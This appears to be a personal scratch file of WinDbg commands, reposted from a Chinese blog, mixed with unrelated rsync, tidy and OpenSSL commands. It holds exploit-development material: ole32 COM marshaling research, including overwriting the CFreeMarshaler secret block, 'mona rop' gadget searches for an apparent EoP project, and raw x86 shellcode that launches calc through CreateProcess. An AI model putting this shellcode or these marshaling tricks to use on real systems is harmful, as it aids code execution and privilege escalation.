F:\tool\dl\DeltaCopyRaw\rsync.exe -v -rlt -z --chmod=a=rw,Da+x -u --password-file=/cygdrive/ --delete "/cygdrive/F/test/" "USER@HOST::wcb" <d:\rsyncd.passwd rsync --daemon --config=/etc/rsyncd.conf netstat -anpt | grep rsync F:\tool\dl\DeltaCopyRaw\rsync.exe -v -rlt -z --chmod=a=rw,Da+x -u --progress --partial --bwlimit=1000 --delete "/cygdrive/D/MyRsync/" "USER@HOST::wcb" <d:\rsyncd.passwd rsync -v -rlt -z --progress --delete /mnt/HD/HD_a2/MyRsync/ USER@HOST::wcb rsync -v -rlt -z --progress --delete USER@HOST::wcb /volume1/HKSync {IID_IROTData} IUnknownPtr cf = nullptr; IBindCtx* bindCtx = NULL; ULONG cchEaten; CreateBindCtx(0, &bindCtx); 0xffe92680=>1d2680 HRESULT hr = _script_moniker->BindToObject(bindCtx, NULL, IID_IPersistStream, (void**)&cf); ERROR_BAD_IMPERSONATION_LEVEL SecurityIdentification SECURITY_IMPERSONATION_LEVEL C:\Windows\System32\tidy.exe --doctype auto --output-html yes --clean yes --indent auto --show-warnings no --vertical-space no --tidy-mark no --wrap 0 --newline CRLF --output-bom yes --show-info yes --show-errors 0 --wrap-script-literals yes --quiet yes --force-output yes --mute-id yes --write-back yes %2 com:pipe,resets=0,reconnect,port=\\.\pipe\kd_server2008r2enterprise !process 0 0 svchost.exe .process /p /r ffffffa8032cf2b10 .reload /f /user ole32.dll .reload /f /v ole32.dll lm vm ole32; !process @$proc 0 ea0000 ?@$proc ole32base 000007fe`ff040000 000007fe`ff2122d0 =1d22d0 ------------------------------------------------ right .process /i /p fffffa8032b9d4f0; g .reload /f /user ole32.dll;lm m ole32; .process /r /p fffffa8032b9d4f0 -------------------------------------------- x63x61x63x6C, 2://.process /i; g 3://.process /r /p fffffa8032b92230 .process /p fffffa8032be2870 .process /i /p fffffa8032be2870 calc .echo rax=>: ;dc @rax L10;.echo rbx=>:;dc @rbx L10;.echo rcx=>:;dc @rcx L10;.echo rdx=>:;dc @rdx L10; dv /i /t /v dt -b this !address -summary x combase!* x ole32!*_SecretLock x qmgr!CJobExternal* dc 
ole32!*_SecretLock; ---------------------------------------------------------------- ~*e .if ( poi(@$teb+0x1758) == 0) { .echo Unknown } .else { .if ( poi(poi(@$teb+0x1758)+c) & 80 ) { .echo STA } .else { .echo MTA } } .load pykd !py mona rop -m mshtml.dll !py mona rop -m *.dll -cp nonull ------------right-------------------------- !py mona rop -m *.dll ------------------------------ 20180505 dt ntdll!_TEB @$teb ny *ole* dt ntdll32!_PEB @$peb x ole32!CExposedStream* bp ole32!DfUnMarshalInterface .reload /f /v ole32.dll ; lm vm ole32; bu ole32!CoCreateObjectInContext; .reload /f /v ole32.dll ; lm vm ole32; x ole32!*CPIDTable* dt ole32!CObjectContext 00000000`00277f90 first 000007fe`fdf00000 000007fe`fe0fc000 ole32 000007fe`fe0d0758 000007fe`fe0cf9c0 ole32!CPIDTable::s_PIDBuckets next 000007fe`fdf00000 000007fe`fe0fc000 ole32 000007fe`fe0cf9c0 ole32!CPIDTable::s_PIDBuckets = struct SHashChain [23] !list -t ole32!SHashChain.pNext -x "dt ole32!SHashChain poi(@$extret)" 000007fe`fdfbf9c8 !list -t ole32!SHashChain.pPrev -x "dt ole32!SHashChain poi(@$extret)" 000007fe`fdfbf9c8 !list -t ole32!SHashChain -l pNext 000007fe`fdfbf9c8 bits first 000007fe`fdf00000 000007fe`fe0fc000 ole32 000007fe`fe0cf9c0 next 000007fe`ff2c0000 000007fe`ff4bc000 ole32 000007fe`ff48f9c0 ole32!CPIDTable::s_PIDBuckets = struct SHashChain [23] ole32!CPIDTable::s_PIDBuckets偏移量?1CF9C0?固定 dps 000007fe`fdfbfa28; dps 00000000`0029fcb0; r @$t1 = 20; r @$t0 =000007fe`fdfbfa28; r @$t1 = 20; r @$t0 =ole32!CPIDTable::s_PIDBuckets; dps poi( poi(@$t0+0x008)+030h) L5;r @$t1 = @$t1-1; dt ole32!shashchain @$t0; r @$t0 = poi(@$t0+0x008)+0x008; z( @$t1);dt ole32!shashchain @$t0; r @$t1 = 20; r @$t0 =ole32!CPIDTable::s_PIDBuckets; dps @$t0 L5;r @$t1 = @$t1-1; dt ole32!shashchain @$t0; r @$t0 = poi(@$t0+0x008)+0x008; z( @$t1);dt ole32!shashchain @$t0; dps 00000000`00357f90 bp ole32!CExposedStream::Unmarshal bp ole32!GenericStream::Read dt _GUID @rsp+38h dt _GUID @rbx dt-b tagOBJREF 
ole32!CBasedILockBytesPtrPtr::CBasedILockBytesPtrPtr bp ole32!GenericStream::Read ---------------------------------------------------------------- eb ole32!CFreeMarshaler::_fSecretInit 01; ed ole32!CFreeMarshaler::_SecretBlock 676e6177 6c656263 73676e69 7374666f; dc ole32!CFreeMarshaler::_SecretBlock L10; dc ole32!CFreeMarshaler::_fSecretInit L10; dc @rsp+28h=>rcx x ole32!CFreeMarshaler::* x ole32!*Secret* bp /p fffffa8032be5060 kernel32!createfilew bp /p fffffa8032be5060 ole32!CFreeMarshaler::InitSecret bp /p @$proc ole32!CFreeMarshaler::UnmarshalInterface ".printf \"InItStatus:=>%d, Secret:is=>%d\", ole32!CFreeMarshaler::_fSecretInit , ole32!CFreeMarshaler::_SecretBlock;dc ole32!CFreeMarshaler::_fSecretInit ; dc ole32!CFreeMarshaler::_SecretBlock; " bp /p @$proc ole32!CStdMarshal::UnmarshalObjRef ".printf \"rbx:is=>%d\", @rbx;" bp /p ffffffa8032cf2b10 ole32!LoadTypeLibEx bp /p fffffa8032be2870 qmgr!CJobExternal::SetNotifyInterfaceInternal bp /p fffffa8032be2870 ole32!CFreeMarshaler::GetUnmarshalClass bp /p fffffa8032be2870 ole32!CStdMarshal::Finish_RemQIAndUnmarshal2 ole32!CProcessSecret::GetProcessSecret dc ole32!CFreeMarshaler::_SecretBlock bp mydriver!myFunction ".if (@eax & 0x0`ffffffff) = 0x0`c0004321 {} .else {gc}" cd G:\重要文件\nas G:\重要文件\nas\openssl\bin\openssl.exe pkcs12 -export -out server.pfx -inkey server.key -in nas.jzrj.club_ssl.crt \x31\xdb\x64\x8b\x7b\x30\x8b\x7f x0c\x8b\x7f\x1c\x8b\x47\x08\x8b x77\x20\x8b\x3f\x80\x7e\x0c\x33 x75\xf2\x89\xc7\x03\x78\x3c\x8b x57\x78\x01\xc2\x8b\x7a\x20\x01 xc7\x89\xdd\x8b\x34\xaf\x01\xc6 x45\x81\x3e\x43\x72\x65\x61\x75 xf2\x81\x7e\x08\x6f\x63\x65\x73 x75\xe9\x8b\x7a\x24\x01\xc7\x66 x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7 x8b\x7c\xaf\xfc\x01\xc7\x89\xd9 xb1\xff\x53\xe2\xfd\x68\x63\x61 x6c\x63\x89\xe2\x52\x52\x53\x53 x53\x53\x53\x53\x52\x53\xff\xd7 x ole32!CoMarshalInterface sxe ld:ole32 !process 0 0 MyComEop.exe right .process /i /p fffffa8034270770; g .reload /f /user ole32.dll;lm m ole32; .process /r /p fffffa8034270770 
NdrGetUserMarshalInfo lm vm ole32;!teb; 725413A8 LoadLibraryExW API-MS-Win-Core-LibraryLoader-L1-1-0
windbg常用命令
转载自blog.csdn.net/oshuangyue12/article/details/80316885